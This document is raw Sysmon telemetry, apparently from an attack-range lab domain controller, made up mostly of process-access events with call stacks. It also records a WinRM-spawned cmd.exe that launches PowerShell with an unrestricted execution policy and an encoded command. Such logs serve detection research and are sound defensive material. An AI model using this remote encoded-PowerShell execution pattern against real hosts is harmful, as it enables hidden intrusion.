13:33:19.356{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.356{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.356{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.356{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.356{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E1F-6005-CD02-00000000A201}888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8E1F-6005-CC02-00000000A201}48841148C:\Windows\system32\cmd.exe{59A5CD1D-8E1F-6005-CD02-00000000A201}888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x8000000000000000338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.357{59A5CD1D-8E1F-6005-CD02-00000000A201}888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1F-6005-C788-100000000000}0x1088c70HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E1F-6005-CC02-00000000A201}4884C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 10341000x8000000000000000337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8E1F-6005-CB02-00000000A201}41484316C:\Windows\system32\conhost.exe{59A5CD1D-8E1F-6005-CC02-00000000A201}4884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.341{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.341{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.341{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.341{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.341{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E1F-6005-CC02-00000000A201}4884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.341{59A5CD1D-8E1F-6005-CA02-00000000A201}45044312C:\Windows\system32\WinrsHost.exe{59A5CD1D-8E1F-6005-CC02-00000000A201}4884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.351{59A5CD1D-8E1F-6005-CC02-00000000A201}4884C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1F-6005-C788-100000000000}0x1088c70HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E1F-6005-CA02-00000000A201}4504C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 
10341000x8000000000000000324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
